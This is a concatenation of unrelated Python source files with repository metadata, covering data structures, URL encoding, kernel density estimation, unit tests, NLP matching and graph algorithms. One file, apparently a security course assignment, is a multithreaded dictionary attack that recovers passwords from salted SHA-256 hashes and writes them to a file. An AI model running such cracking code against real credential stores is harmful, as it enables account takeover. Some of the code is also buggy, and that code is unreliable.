walk = ('verb', 'walk')
run = ('verb', 'run')
kill = ('verb', 'kill')
eat = ('verb', 'eat')
the = ('stop', 'the')
in_ = ('stop', 'in')
of = ('stop', 'of')
a = ('stop', 'a')
an = ('stop', 'an')
bear = ('noun', 'bear')
princess = ('noun', 'princess')
lexicon = [north, south, east, west,
go, walk, run, kill, eat,
the, in_, of, a, an,
bear, princess]
words = sentence.split()
#print words
matched = []
for i in words:
#error = True
for j in lexicon:
if i == j[1]:
# error = False
matched.append(j)
if i.isdigit() == True:
i = int(i)
error = False
matched.append(('number', i))
#if error == True:
# matched.append(('error', i))
#print matched
return matched
| true |
ba94f1528e8695d3869e85c297c3a5a8cf28860b | Python | Lokeshwarrobo/Data-Structures | /Circular_Linked_List.py | UTF-8 | 3,338 | 3.703125 | 4 | [] | no_license | class Node:
def __init__(self, data):
self.data = data
self.next = None
class Circular_Linked_List:
def __init__(self):
self.head = None
def append(self, data):
if self.head is None:
self.head = Node(data)
self.head.next = self.head
else:
new_node = Node(data)
cur = self.head
while cur.next != self.head:
cur = cur.next
cur.next = new_node
new_node.next = self.head
def prepend(self, data):
new_node = Node(data)
cur_node = self.head
new_node.next = self.head
if self.head is None:
self.head = new_node
else:
while cur_node.next != self.head:
cur_node = cur_node.next
cur_node.next = new_node
self.head = new_node
def __len__(self):
cur_node = self.head
l = 0
while cur_node :
l += 1
cur_node = cur_node.next
if cur_node == self.head:
break
return l
def split(self):
size = len(self)
mid = size // 2
count = 0
cur = self.head
prev = None
while cur and count < mid:
prev = cur
cur = cur.next
count += 1
prev.next = self.head
split2 = Circular_Linked_List()
while cur.next != self.head:
split2.append(cur.data)
cur = cur.next
split2.append(cur.data)
CL.print_list()
print("\n")
split2.print_list()
def remove_element(self, key):
if self.head.data == key:
prev = None
cur = self.head
while cur.next != self.head:
cur = cur.next
cur.next = self.head.next
self.head = self.head.next
else:
prev = None
cur = self.head
while cur.next != self.head:
prev = cur
cur = cur.next
while cur.data == key:
prev.next = cur.next
cur = cur.next
def remove_node(self, node):
if self.head == node:
prev = None
cur = self.head
while cur.next != self.head:
cur = cur.next
cur.next = self.head.next
self.head = self.head.next
else:
prev = None
cur = self.head
while cur.next != self.head:
prev = cur
cur = cur.next
while cur == node:
prev.next = cur.next
cur = cur.next
def josephus_circle(self, step):
cur = self.head
while len(self)>1:
count = 1
while count != step:
cur = cur.next
count += 1
self.remove_node(cur)
cur = cur.next
def print_list(self):
cur = self.head
while cur:
print(cur.data)
cur = cur.next
if cur == self.head:
break
CL = Circular_Linked_List()
CL.append("A")
CL.append("B")
CL.append("C")
CL.append("D")
CL.prepend("E")
CL.josephus_circle(3)
CL.print_list()
CL.remove_element("E") | true |
fc262adc7e1c8b7fff39b2443a91dabe91ef6cdc | Python | li199773/Web-Crawler | /6 WebSpider基础知识讲解/03 parse的使用和介绍.py | UTF-8 | 1,754 | 3.578125 | 4 | [] | no_license | """
url 只能由特定的字符组成,字母,数字,下划线
如果出现其他的,比如¥ 空格 中文等,就要对其进行编码
url.parse
.quote:解码函数,将中文转换成%xxx
.unquote:编码函数,将%xxx转化成指定的字符
.unlencode:给一个字典,将字典拼接成query_string,并且实现自动编码的功能,(有些网址中不能出现非法的字符 )
"""
import urllib.parse
# image_url = 'https://gimg2.baidu.com/image_search/src=http%3A%2F%2Fi.serengeseba.com%2Fuploads%2Fi_4_2475446966x1356278756_26.jpg&refer=http%3A%2F%2Fi.serengeseba.com&app=2002&size=f9999,10000&q=a80&n=0&g=0n&fmt=jpeg?sec=1622273715&t=6af6c1555229cdc7c4c5b4b668ce203a'
#
# url = 'http://www.baidu.com/index.html?name=中国&pwd=123456'
# # url进行解码,不然访问失败,因为有网页不识别的符号
# reture = urllib.parse.quote(url)
# # 进行编码
# re = urllib.parse.unquote(reture)
# print(re)
#.unlencode:相关介绍
url = 'http://www.baidu.com/'
# url = 'http://www.baidu.com/index.html?name=中国&age=18&height=180&sex=nv&weight=180'
# 如何拼接成上述的url网址
name = '中国'
age = '18'
height = '180'
sex = 'nv'
weight = '180'
data = {
'name': name,
'age': age,
'sex': sex,
'height': height,
'weight': weight,
}
# 遍历字典 一般情况下需要自己写
# 先来一个空的列表
# lt = []
# for k, v in data.items():
# lt.append(k + '=' + str(v))
# query_string = '&'.join(lt)
# 相关网站的拼接会经常使用
# 但是在parse中已经封装好了相关的代码
query_string = urllib.parse.urlencode(data)
# 参数必须是字典的形式
print(query_string)
url = url + '?' + query_string
print(url)
| true |
6fc01bd7a0854658f68d5f0877755c566518d2ba | Python | Pedroh097/Mi-Primer-Programa | /vocales_y_consonantes.py | UTF-8 | 441 | 3.984375 | 4 | [] | no_license |
texto_del_usuario = input("Dime una texto:")
puntos = "."
comas = ","
espacios = " "
n_puntos = 0
n_comas = 0
n_espacios = 0
for signo in texto_del_usuario:
if signo in puntos:
n_puntos += 1
if signo in comas:
n_comas += 1
if signo in espacios:
n_espacios += 1
print("Los puntos son {}".format(n_puntos))
print("Las comas son {}".format(n_comas))
print("Los espacios son {}".format(n_espacios))
| true |
214dbf422df8090499308cf1d7345136568935eb | Python | ViniciusLima94/PythonInformationTheoryModule | /infoPy/utils/tools.py | UTF-8 | 2,100 | 3.421875 | 3 | [] | no_license | import numpy as np
def silverman(Nvar, Nobs):
return (Nobs * (Nvar + 2) / 4.)**(-1. / (Nvar + 4))
def normalize_data(x):
#####################################################################################################
# Description: Normalize each column of the data matrix X
# > Inputs:
# x: Data matrix must have size [N_variables, N_observations].
# > Outputs:
# Normalized data
#####################################################################################################
from sklearn.preprocessing import StandardScaler
# Checking data shape
if x.shape[0] >= 1:
x = x.T
if len(x.shape) == 1:
x = x[np.newaxis, :].T
# Instantiate scaler object
scaler = StandardScaler()
# Fit on data
scaler.fit(x.T)
# Transform dada
x_norm = scaler.transform(x.T)
return x_norm.T
def KernelDensityEstimator(x, bandwidth, kernel = 'tophat', metric = 'euclidean', algorithm = 'auto'):
#####################################################################################################
# Description: Uses kernel estimaton to compute probabiliry distribution
# > Inputs:
# x: Data matrix must have size [N_variables, N_observations].
# bandwidth: Kernel bandwidth
# kernel: Kernel shape [‘gaussian’|’tophat’|’epanechnikov’|’exponential’|’linear’|’cosine’]
# metric: Distance metric to use [‘euclidean’|‘manhattan’|‘chebyshev’|‘minkowski’|]
# for more see: https://scikit-learn.org/stable/modules/generated/sklearn.neighbors.DistanceMetric.html
# > Outputs:
# Probability distribution of the data obtained with kernel density estimation
#####################################################################################################
from sklearn.neighbors import KernelDensity
# Checking data shape
if x.shape[0] >= 1:
x = x.T
if len(x.shape) == 1:
x = x[np.newaxis, :].T
d = x.shape[0]
kde = KernelDensity(bandwidth=bandwidth, kernel=kernel, metric=metric, algorithm=algorithm)
if d == 1:
kde.fit(x)
p = kde.score_samples(x)
else:
kde.fit(x)
p = kde.score_samples(x)
return np.exp(p) | true |
9461ffece7f8a30b2496a1239cb5fc32c6e6f6c5 | Python | varunchodanker/ThreeAnimators | /tools/font_centering_pos.py | UTF-8 | 723 | 2.96875 | 3 | [
"MIT"
] | permissive | from manim import *
""" Contains dictionaries adjusting the position of letters of a particular
font, as ``Text(letter, font=...)`` centered with reference to a circle with
attr ``radius=0.5``
"""
FUTURA_CENTERING_POS = {
"A": 0.04 * UP, "B": 0.03 * RIGHT, "C": 0.04 * LEFT, "D": 0.04 * RIGHT,
"E": 0.01 * DOWN, "F": 0.02 * RIGHT + 0.01 * DOWN, "G": ORIGIN,
"H": 0.004 * RIGHT, "I": ORIGIN, "J": 0.035 * LEFT, "K": 0.025 * RIGHT,
"L": 0.025 * RIGHT, "M": 0.02 * UP, "N": ORIGIN, "O": ORIGIN,
"P": 0.035 * RIGHT + 0.01 * DOWN, "Q": ORIGIN, "R": 0.03 * RIGHT,
"S": ORIGIN, "T": 0.03 * DOWN, "U": 0.02 * DOWN, "V": 0.045 * DOWN,
"W": 0.05 * DOWN, "X": 0.01 * DOWN, "Y": 0.03 * DOWN, "Z": ORIGIN
} | true |
4e0d7e59f2f91d56c4f0fb77df6e827ec896e319 | Python | FelixSchwarz/smartconstants | /smart_constants_test.py | UTF-8 | 6,701 | 2.859375 | 3 | [
"MIT"
] | permissive | # -*- coding: UTF-8 -*-
# Copyright 2010-2013, 2017, 2019 Felix Schwarz
# The source code in this file is licensed under the MIT license.
from __future__ import absolute_import, print_function, unicode_literals
from pythonic_testcase import *
from smart_constants import attrs, BaseConstantsClass
class DummyConstants(BaseConstantsClass):
foo = "bar"
bar = "quux"
_fnord = "fnord"
def fnord(self):
return None
def skip_unless_enum_is_available():
try:
import enum
has_enum = True
except ImportError:
has_enum = False
if not has_enum:
skip_test('no enum module available')
class BaseConstantsClassTest(PythonicTestCase):
def test_ignores_private_names(self):
assert_not_contains("_fnord", DummyConstants.constants())
def test_ignores_functions(self):
assert_not_contains("fnord", DummyConstants.constants())
def test_can_get_names_of_all_defined_constants(self):
assert_equals(("foo", "bar"), DummyConstants.constants())
def test_can_get_values_of_all_defined_constants(self):
assert_equals(("bar", "quux"), DummyConstants.values())
def test_can_return_name_for_specified_value(self):
assert_equals("bar", DummyConstants.constant_for("quux"))
def test_can_return_enum_instance(self):
skip_unless_enum_is_available()
dummy_enum = DummyConstants.as_enum()
assert_equals('bar', dummy_enum.foo.value)
assert_equals('quux', dummy_enum.bar.value)
assert_false(hasattr(dummy_enum, '_fnord'))
dummy_enum2 = DummyConstants.as_enum()
assert_equals(
id(dummy_enum), id(dummy_enum2),
message='returned enum instance should be a singleton'
)
def test_provides_enum_methods(self):
skip_unless_enum_is_available()
assert_true(hasattr(DummyConstants, '__members__'))
dummy_enum = DummyConstants.as_enum()
assert_equals(dummy_enum.__members__, DummyConstants.__members__)
class CodesWithAttributes(BaseConstantsClass):
foo = 4, attrs(label="Foo")
bar = 5, attrs(label="Bar")
qux = 2, attrs(label="Quux")
class CodesWithHiddenAttributes(BaseConstantsClass):
foo = 4, attrs(label="Foo", visible=False)
bar = 5, attrs(label="Bar", visible=True)
class MethodAutoGenerationForBaseConstantsTest(PythonicTestCase):
def test_can_get_values_even_with_extended_attributes(self):
assert_equals((4, 5, 2), CodesWithAttributes.values())
def test_can_access_constants_as_attributes(self):
assert_equals(4, CodesWithAttributes.foo)
def test_can_get_constant_names_even_with_extended_attributes(self):
assert_equals(("foo", "bar", "qux"), CodesWithAttributes.constants())
def test_can_return_options_for_select(self):
assert_equals(((4, "Foo"), (5, "Bar"), (2, "Quux")),
CodesWithAttributes.options())
def test_hidden_constants_are_not_returned_for_select(self):
assert_equals(((5, "Bar"),), CodesWithHiddenAttributes.options())
def test_can_return_hidden_constant_if_it_is_the_current_value(self):
"""Sometimes it is desirable to allow certain values in a select field
even if the constant is usually hidden. For example some constants
should be phased out but existing data should be editable without the
need to change the current value."""
assert_equals(((5, "Bar"),), CodesWithHiddenAttributes.options())
options = CodesWithHiddenAttributes.options(current_value=CodesWithHiddenAttributes.foo)
assert_equals(((4, "Foo"), (5, "Bar")), options)
def test_can_get_label_for_value(self):
assert_equals("Foo", CodesWithAttributes.label_for(CodesWithAttributes.foo))
assert_equals("Quux", CodesWithAttributes.label_for(CodesWithAttributes.qux))
def test_uses_value_as_label_for_simple_constants(self):
assert_equals("quux", DummyConstants.label_for(DummyConstants.bar))
class ConstantWithEmptyValueTest(PythonicTestCase):
def test_can_define_optional_value_with_string_label(self):
class OptionalCode(BaseConstantsClass):
_ = 'empty'
foo = 4, attrs(label="Foo")
# the optional value does not use an attrs object, therefore ordering
# of constants is undefined (=> use a set for assertions)
assert_equals(set((None, 'foo')), set(OptionalCode.constants()))
assert_equals(set((None, 4)), set(OptionalCode.values()))
assert_equals(set(((None, 'empty'), (4, 'Foo'))),
set(OptionalCode.options()))
def test_can_define_optional_value_with_attrs(self):
class OptionalCode(BaseConstantsClass):
_ = None, attrs(label='empty')
foo = 4, attrs(label="Foo")
assert_equals((None, 'foo'), OptionalCode.constants())
assert_equals((None, 4), OptionalCode.values())
assert_equals(((None, 'empty'), (4, 'Foo')), OptionalCode.options())
def test_can_define_hidden_optional_value(self):
class OptionalCode(BaseConstantsClass):
_ = None, attrs(visible=False)
foo = 4, attrs(label="Foo")
assert_equals(((4, 'Foo'),), OptionalCode.options())
assert_equals(((None, None), (4, 'Foo')),
OptionalCode.options(current_value=None))
class ConstantWithCustomDataTest(PythonicTestCase):
def test_can_add_custom_data(self):
class OptionalData(BaseConstantsClass):
foo = 4, attrs(data=[1, 2, 3])
assert_equals([1, 2, 3], OptionalData.data_for(OptionalData.foo))
def test_can_add_custom_data_with_arbitrary_attribute_names(self):
data_as_list = attrs(data=[42, 21])
assert_equals([42, 21], data_as_list.data)
kw_only = attrs(answer=42, question=21)
assert_equals(
{'answer': 42, 'question': 21},
kw_only.data
)
data_as_dict = attrs(data={'answer': 42, 'question': 21})
assert_equals(
{'answer': 42, 'question': 21},
data_as_dict.data
)
def test_can_return_custom_data_in_options(self):
class CustomData(BaseConstantsClass):
foo = 4, attrs(data=u'foogroup')
bar = 7, attrs(group=u'bg', css=u'blue')
data_options = CustomData.options()
assert_equals(((4, None), (7, None)), data_options)
foo = data_options[0]
assert_equals('foogroup', foo.data)
bar = data_options[1]
assert_equals('bg', bar.group)
assert_equals('blue', bar.css)
| true |
79d806f7bfdac9865d287d05b58ceb9d936167aa | Python | taanh99ams/taanh-fundamental-c4e15 | /SS01/SS01 Asignment/multicircle.py | UTF-8 | 126 | 3.375 | 3 | [] | no_license | from turtle import *
color("green")
shape("turtle")
speed(500)
for i in range (6):
circle(100)
left(60)
mainloop()
| true |
b6d0537a4427212e55b349016eebbf3130c7c698 | Python | eomjinyoung/bigdata3 | /bit-python01/src08/calculator.py | UTF-8 | 172 | 3.484375 | 3 | [] | no_license | # 계산 모듈
def plus(a, b):
return a + b
def minus(a, b):
return a - b
def multiple(a, b):
return a * b
def divide(a, b):
return a / b
| true |
4569eb905a0b84c9f9d133f26764454154c5bf9c | Python | ushham/MScFireSpreadModel | /Fire_Locations/ConvexHull.py | UTF-8 | 1,412 | 2.8125 | 3 | [
"MIT"
] | permissive | import pandas as pd
import numpy as np
from scipy.interpolate import griddata
from Mapping_Tools import RasterConvert as rc
def CreateSurface(fileloc, filename, dumploc, coord1, coord2, sizex, sizey, boolian):
#Opens file, or expected df to be passed, and returns a sursafe of expected fire based on FRP
#Saves a raster of surface
#constants
lat = 'LATITUDE'
long = 'LONGITUDE'
conf = 'FRP'
#checks if file or df is passed
if boolian:
firedata = pd.read_csv(fileloc + '\\' + filename)
else:
firedata = fileloc
#set size of arrays
points = np.array(firedata[[lat, long]])
delx = abs(coord1[1] - coord2[1]) / sizex
dely = abs(coord1[0] - coord2[0]) / sizey
#create evenly spaced array given number of boxes
x = np.arange(min(coord1[1], coord2[1]), max(coord1[1], coord2[1]), delx)
y = np.arange(max(coord1[0], coord2[0]), min(coord1[0], coord2[0]), -dely)
grid_x, grid_y = np.meshgrid(x, y)
pointy = points[:, 0]
pointx = points[:, 1]
#create surface
#Check if there are enough points to make surface
if len(firedata.index) >= 4:
z = griddata((pointx, pointy), firedata[conf], (grid_x, grid_y), method='linear')
#Convert surface to raster file
rc.Convert2tif(z, dumploc, coord1, coord2, sizex, sizey, False)
else:
print('Not enough points at ' + dumploc)
return 0 | true |
45a6447dce9074212586d308f84bb677550882e9 | Python | rose317/miniweb | /demo_装饰器.py | UTF-8 | 323 | 3.140625 | 3 | [] | no_license | import time
def set_func(func):
def call_func():
start_time = time.time()
func()
stop_time = time.time()
print("函数总共运行时间%f" % (stop_time-start_time))
return call_func
@set_func
def test1():
print("这是test1")
for i in range(100000):
pass
test1() | true |
b1a97d28f4bf4184c57b1eb3dbfabd5e3b0beac1 | Python | xy990/bigdata | /boros/man0616.py | UTF-8 | 1,166 | 3.03125 | 3 | [] | no_license | #!/usr/bin/env python
import csv
import sys
reader = csv.reader(sys.stdin)
# Skip first row
next(reader, None)
brooklyn = {'2006':0,'2007':0,'2008':0,'2009':0,'2010':0,'2011':0,'2012':0,'2013':0,'2014':0,'2015':0,'2016':0}
for entry in reader:
BORO_NM = str(entry[13])
year = str(entry[1])
if BORO_NM == 'MANHATTAN':
if year[-4:] == '2006':
brooklyn['2006'] += 1
elif year[-4:] == '2007':
brooklyn['2007'] += 1
elif year[-4:] == '2008':
brooklyn['2008'] += 1
elif year[-4:] == '2009':
brooklyn['2009'] += 1
elif year[-4:] == '2010':
brooklyn['2010'] += 1
elif year[-4:] =='2011':
brooklyn['2011'] += 1
elif year[-4:] == '2012':
brooklyn['2012'] += 1
elif year[-4:] == '2013':
brooklyn['2013'] += 1
elif year[-4:] == '2014':
brooklyn['2014'] += 1
elif year[-4:] == '2015':
brooklyn['2015'] += 1
#else:
#brooklyn['else'] += 1
#else:
#brooklyn['invalid'] += 1
for k in brooklyn.keys():
print '%s\t%d' % (k,brooklyn[k])
| true |
1b14761c7a13ab3459e98462bee52802dcf4f123 | Python | quimey/itchallenge-2018 | /china/unshuffle4.py | UTF-8 | 744 | 2.578125 | 3 | [] | no_license | from PIL import Image
import os
import random
images = []
img = []
N = 200
for filename in os.listdir('sarasas'):
if len(images) >= N:
break
if filename[-3:] == 'pgm':
continue
try:
im = Image.open(os.path.join('sarasas', filename))
img.append(im)
images.append(im.load())
except OSError:
pass
def calc(b, d, i):
s = 0
for v in range(64):
s += abs(images[i][4 * b, v] - images[i][4 * d, v])
return s
vecs = {}
for b in range(16):
res = []
for d in range(16):
s = 0
for i in range(N):
s += calc(b, d, i)
res.append((s, d))
res.sort()
print(b)
for s, d in res[1: 3]:
print(d, s)
print("--")
| true |
e5ca0fc360330ef766c6cb85e5262aa270f1fe8c | Python | tonyfresher/graph-algo | /net_shortest_path/main.py | UTF-8 | 3,122 | 3.40625 | 3 | [] | no_license | from collections import deque
class Net:
@classmethod
def from_lists(self, lists):
net = self()
net.topology, net.weights = self._convert_lists_to_topology(lists)
return net
@staticmethod
def _convert_lists_to_topology(lists):
vertex_count = len(lists)
topology = {n: [] for n in range(1, vertex_count + 1)}
weights = {}
for v_from in range(vertex_count):
for i in range(0, len(lists[v_from]), 2):
v_to = lists[v_from][i]
topology[v_from + 1].append(v_to)
weights[(v_from + 1, v_to)] = int(lists[v_from][i + 1])
return topology, weights
def find_shortest_path(self, old_start, old_goal):
vertex_count = len(self.topology)
self.topology, self.weights, index = self._topsort(self.topology, self.weights)
reversed_index = {index[i]: i for i in index}
start, goal = index[old_start], index[old_goal]
distance, previous = {}, {}
distance[start] = 0
previous[start] = 0
for k in range(start + 1, vertex_count + 1):
distance[k] = float('inf')
previous[k] = start
for k in range(start, vertex_count + 1):
for v in self.topology[k]:
if distance[k] + self.weights[(k, v)] < distance[v]:
distance[v] = distance[k] + self.weights[(k, v)]
previous[v] = k
path = [goal]
node = goal
while (node != start):
node = previous[node]
path.append(node)
return [reversed_index[i] for i in path[::-1]], distance[goal]
@staticmethod
def _topsort(topology, weights):
stack = deque()
deg_in = {v: 0 for v in topology}
index = {}
for v in topology:
for w in topology[v]:
deg_in[w] += 1
for v in topology:
if deg_in[v] == 0:
stack.append(v)
number = 1
while stack:
node = stack.popleft()
index[node] = number
number += 1
for w in topology[node]:
deg_in[w] -= 1
if deg_in[w] == 0:
stack.append(w)
sorted_topology = {}
for v in topology:
sorted_topology[index[v]] = {index[w] for w in topology[v]}
topology = sorted_topology
weights = {(index[v], index[w]): weights[v, w] for v, w in weights}
return topology, weights, index
def main(args=None):
lists = [
[2, 1, 3, 5, 4, 3],
[3, 2, 5, 2, 6, 10],
[4, 10, 6, 10],
[6, 1, 7, 2],
[6, 15, 8, 12],
[7, 10, 8, 2],
[8, 15],
[],
[]
]
start, goal = 1, 8
net = Net.from_lists(lists)
path, weight = net.find_shortest_path(start, goal)
if weight != float('inf'):
print(path)
print(weight)
else:
print('There is no path between current start and goal')
if __name__ == '__main__':
main()
| true |
9a06d6372a0ac36597afefb34be9d6bc6ee014f9 | Python | axelfahy/rhinopics | /rhinopics/__main__.py | UTF-8 | 2,134 | 2.984375 | 3 | [
"MIT"
] | permissive | # -*- coding: utf-8 -*-
"""Entry point of the rhinopics cli."""
import os
import pathlib
import click
import click_pathlib
from tqdm import tqdm
from .rhinobuilder import RhinoBuilder
@click.command()
@click.argument('keyword', type=str, default=str(os.path.basename(os.getcwd())))
@click.option('--directory', '-d',
default='./', show_default=True,
type=click_pathlib.Path(exists=True, file_okay=False,
dir_okay=True, readable=True),
help='Directory containing the pictures to rename.'
)
@click.option('--backup', '-b', is_flag=True, show_default=True,
help='Create copies instead of renaming the files.'
)
@click.option('--lowercase', '-l', is_flag=True, default=True, show_default=True,
help='Modify the extension to lowercase.'
)
def main(keyword: str, directory: pathlib.PosixPath, backup: bool, lowercase: bool):
"""Rename all pictures in a directory with a common keyword.
The date from the metadata of the pictures is retrieved and concanated to the keyword,
followed by a counter to distinguish pictures taken the same day.
Parameters
----------
keyword : str
Common keyword to use when renaming the pictures.
The default value is the name of the current folder.
directory : str, default './'
Directory containing the pictures to rename, default is the current directory.
backup : bool, default False
If flag is present, copy the pictures instead of renaming them.
Examples
--------
$ rhinopics mykeyword
-> mykeyword_20190621_001
"""
paths = sorted(directory.glob('*'), key=os.path.getmtime)
nb_digits = len(str(len(paths)))
builder = RhinoBuilder(nb_digits, keyword, backup, lowercase)
with tqdm(total=len(paths)) as pbar:
for path in paths:
rhino = builder.factory(path)
if rhino is not None:
rhino.rename()
pbar.update()
if __name__ == '__main__':
main() # pylint: disable=no-value-for-parameter
| true |
ac28649a8bd8a01bf8fbd00cca71dda227a3edab | Python | Babnik21/Euler | /Euler 28.py | UTF-8 | 197 | 2.84375 | 3 | [
"MIT"
] | permissive | i = 2
stevilo = 1
vsota = 1
counter = 0
while stevilo < 1001*1001:
while counter < 4:
counter += 1
stevilo += i
vsota += stevilo
i += 2
counter = 0
print(vsota) | true |
d6c5da921684b727a04fa3e4c21c591bfe1cbbe2 | Python | jabulenc/CSProj-AtmBankSecurity | /p3/task4/Task4.py | UTF-8 | 1,881 | 2.640625 | 3 | [] | no_license | #!/usr/bin/python
import sys
import Queue
import threading
import time
import multiprocessing
import hashlib
import base64
exitFlag = 0
class myThread (threading.Thread):
def __init__(self, threadID, q):
threading.Thread.__init__(self)
self.threadID = threadID
self.q = q
def run(self):
crack(self.q)
#New IDea - each thread makes its own buffer of hashed passwords
#compare existing hashes against those
def crack(q):
while not exitFlag:
queueLock.acquire()
if not workQueue.empty():
print 'getting new hash'
data = q.get()
print data
queueLock.release()
for pw in pws:
pw = pw.strip()
result = base64.b64encode(hashlib.sha256('CMSC414'+ pw +'Fall16').digest())
#print result
if data == result:
writelock.acquire()
outfile.write(pw+"\n")
writelock.release()
print pw
break
else:
continue
if data != result:
writelock.acquire()
outfile.write(data+"\n")
writelock.release()
else:
queueLock.release()
#time.sleep(1) May not need this line at all
pwfilename = sys.argv[1]
hashfilename = sys.argv[2]
cpus = multiprocessing.cpu_count()
queueLock = threading.Lock()
writelock = threading.Lock()
workQueue = Queue.Queue(100)
threads = []
pws = tuple(open(pwfilename, 'r'))
hashes = tuple(open(hashfilename, 'r'))
outfile = open('cracked.txt', 'w')
print cpus
# Fill the queue
queueLock.acquire()
for hash in hashes:
workQueue.put_nowait(hash.strip()) #strip all whitespace
queueLock.release()
# Create new threads
for x in xrange(cpus):
thread = myThread(x, workQueue)
thread.start()
threads.append(thread)
# Wait for queue to empty
while not workQueue.empty():
pass
# Notify threads it's time to exit
exitFlag = 1
outfile.close()
# Wait for all threads to complete
for t in threads:
t.join()
| true |
e6a19cb795f3aed10f2f535a73f1521125433268 | Python | wangyu33/LeetCode | /LeetCode1854.py | UTF-8 | 628 | 3.25 | 3 | [] | no_license | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# File : LeetCode1854.py
# Author: WangYu
# Date : 2021/5/10
from typing import List
from collections import defaultdict
class Solution:
def maximumPopulation(self, logs: List[List[int]]) -> int:
d = defaultdict(int)
for b, death in logs:
for i in range(b, death):
d[i] += 1
maxn = 0
mdata = -1
for i in range(1950, 2051):
if d[i] > maxn:
mdata = i
maxn = d[i]
return mdata
logs = [[1993,1999],[2000,2010]]
s = Solution()
print(s.maximumPopulation(logs)) | true |
d03e356f6e4c11a3fe90272c106610017428ec77 | Python | lekhakpadmanabh/mlpy | /matching-book-abstract.py | UTF-8 | 1,205 | 2.671875 | 3 | [] | no_license | import nltk.stem
import numpy as np
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import cosine_similarity
import scipy as sp
def grab_input():
titles = []
descrs = []
N = int(raw_input())
for i in xrange(N):
titles.append(raw_input())
breaker = raw_input()
for i in xrange(N):
descrs.append(raw_input())
return titles,descrs, N
titles,desc, N = grab_input()
english_stemmer = nltk.stem.SnowballStemmer('english')
class StemmedTfidfVectorizer(TfidfVectorizer):
def build_analyzer(self):
analyzer = super(TfidfVectorizer, self).build_analyzer()
return lambda doc: (english_stemmer.stem(w) for w in analyzer(doc))
tfidf = StemmedTfidfVectorizer(min_df=1, stop_words='english', analyzer='word', ngram_range=(1,3))
dvec = tfidf.fit_transform(desc)
def test(sample):
svec = tfidf.transform([sample])
sim = cosine_similarity(svec,dvec)
return np.argmax(sim)
t_indices = np.zeros(len(titles))
for i,d in enumerate(desc):
t_index = int(test(titles[i]))
t_indices[t_index]=i
t_indices = list(map(lambda x: x+1,map(int,t_indices.tolist())))
print '\n'.join(str(p) for p in t_indices)
| true |
9ee5ae25c5b9f77e7efcf2c36b0b88f9ad4adcad | Python | akitanak/try-fastapi | /try_fastapi/applications/tasks.py | UTF-8 | 883 | 2.71875 | 3 | [] | no_license | from typing import Dict, List
from try_fastapi.domains.entities.tasks import Priority, Task
class TaskService:
def add(self, task_dict: Dict) -> Task:
task = Task(
task_name=task_dict["task_name"],
due_date=task_dict.get("due_date"),
priority=task_dict.get("priority"),
)
return task
def list(self) -> List[Task]:
return [to_task(task) for task in tasks]
tasks = [
{"task_name": "歯を磨く"},
{"task_name": "顔を洗う", "priority": "high"},
{"task_name": "朝ごはんを食べる", "priority": "low"},
]
def to_task(task_dict: Dict) -> Task:
return Task(
task_name=task_dict["task_name"],
due_date=task_dict.get("due_date"),
priority=Priority.valueOf(task_dict.get("priority"))
if task_dict.get("priority") is not None
else None,
)
| true |
278039337016badc4915725b5d0c0a56c6fe9819 | Python | Minyus/utility_python_scripts | /print_progress.py | UTF-8 | 1,259 | 3.28125 | 3 | [] | no_license | # -*- coding: utf-8 -*-
import sys
import time
def print_progress(iteration, total_iterations, update_interval_sec = 1.0):
global _time_started, _time_updated
t = time.time()
i = iteration
if i==0:
_time_started = _time_updated = t
elif ((t - _time_updated) > update_interval_sec) or i == (total_iterations - 1) :
_time_updated = t
t_elapsed = t - _time_started
i_ = i + 1
progress = i_ / total_iterations
progress_pct = 100 * progress
t_est_total = t_elapsed / progress
t_est_remained = t_est_total - t_elapsed
sys.stdout.write(f'\rProgress:{progress_pct: 5.2f} % ' \
+ f' | Processed:{i_: d}/{total_iterations: d} ' \
+ f' | Elapsed: {t_elapsed: 8.0f} sec' \
+ f' | Est total: {t_est_total: 8.0f} sec' \
+ f' | Est remained: {t_est_remained: 8.0f} sec' \
)
sys.stdout.flush()
if i == (total_iterations - 1):
print()
### Example ###
if __name__ == "__main__":
total_iterations = 100
for i in range(total_iterations):
print_progress(i, total_iterations) | true |
a588c904eaac17ac3c71cd3a056ab2cd87ecfb46 | Python | bcmi220/d2gpo | /examples/d2gpo/scripts/generate_d2gpo_distribution.py | UTF-8 | 3,400 | 2.609375 | 3 | [
"MIT"
] | permissive | import scipy.stats as stats
import sys
import numpy as np
import tqdm
from sklearn.utils.extmath import softmax
import h5py
import argparse
def scatter(a, dim, index, b): # a inplace
expanded_index = tuple([index if dim==i else np.arange(a.shape[i]).reshape([-1 if i==j else 1 for j in range(a.ndim)]) for i in range(a.ndim)])
a[expanded_index] = b
if __name__ == '__main__':
'''
'''
parser = argparse.ArgumentParser(description='Prior Distribution Generation')
parser.add_argument("--d2gpo_mode", type=str, default="")
parser.add_argument("--d2gpo_order_idx", type=str, default="")
parser.add_argument("--d2gpo_softmax_position", type=str, default="")
parser.add_argument("--d2gpo_softmax_temperature", type=float, default=1.0)
parser.add_argument("--d2gpo_distribution_output", type=str, default="")
parser.add_argument("--d2gpo_sample_width", type=int, default=200)
parser.add_argument("--d2gpo_gaussian_std", type=float, default=1)
parser.add_argument("--d2gpo_gaussian_offset", type=int, default=0)
parser.add_argument("--d2gpo_linear_k", type=float, default=-1)
parser.add_argument("--d2gpo_cosine_max_width", type=int, default=200)
parser.add_argument("--d2gpo_cosine_offset", type=int, default=0)
args = parser.parse_args()
mode = args.d2gpo_mode
assert mode in ['gaussian', 'linear', 'cosine']
if mode == 'gaussian':
std = args.d2gpo_gaussian_std
offset = args.d2gpo_gaussian_offset
mean = 0
distribution_func = stats.norm(mean, std)
elif mode == 'linear':
k = args.d2gpo_linear_k
assert k < 0
b = 1.0
offset = 0
assert (-b / k) >= (offset + args.d2gpo_sample_width)
elif mode == 'cosine':
max_width = args.d2gpo_cosine_max_width
offset = args.d2gpo_cosine_offset
assert max_width >= (offset + args.d2gpo_sample_width)
assert args.d2gpo_softmax_position in ['presoftmax', 'postsoftmax']
# load the order information
with open(args.d2gpo_order_idx, 'r', encoding='utf-8') as fin:
data = fin.readlines()
data = [[int(item) for item in line.strip().split()] for line in data if len(line.strip())>0]
assert len(data) == len(data[0])
if args.d2gpo_sample_width == 0:
args.d2gpo_sample_width = len(data)
x = np.arange(args.d2gpo_sample_width) + offset
if mode == 'gaussian':
y_sample = distribution_func.pdf(x)
elif mode == 'linear':
y_sample = k * x + b
else:
y_sample = np.cos(np.pi / 2 * x / max_width)
if args.d2gpo_softmax_position == 'presoftmax':
